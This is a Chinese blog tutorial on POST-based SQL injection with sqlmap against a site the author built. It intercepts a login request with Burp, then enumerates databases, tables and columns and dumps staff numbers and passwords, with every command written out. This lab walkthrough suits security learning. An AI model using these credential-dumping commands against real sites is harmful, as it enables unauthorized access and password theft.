利用sqlmap进行post注入(实操)

本次实验使用的网站是博主自己搭建的一个简单的信息管理系统

1、配置浏览器代理,并打开burp

 2、打开网站,工号和密码随便填写,点击登录

3、通过burp拦截到数据包

4、将拦截到的数据包保存为文本文件

 

5、打开sqlmap,对该网站进行扫描

sqlmap -r /root/test/1.txt

扫描得到数据库和服务器的版本

扫描数据库

sqlmap -r /root/test/1.txt --dbs

结果得到9个数据库

 

 指定数据库为salary_management,继续扫描表名

sqlmap -r /root/test/1.txt -D salary_management --tables

结果得到5个表

  

我们比较关心user表中的内容,再进一步对user表中的列名进行扫描

sqlmap -r /root/test/1.txt -D salary_management -T user --columns

可以得到user表中的各个列名与对应的类型

由于登录时需要用到“工号”和“密码”,所以我们把这两列中的内容列出来

sqlmap -r /root/test/1.txt -D salary_management -T user -C "staff_number,password" --dump

 最后得到工号和对应的密码

 由于网站是自己搭建的,我们可以查看网站的数据库

可以发现工号和密码与使用sqlmap扫描出来的一致 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ltachl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值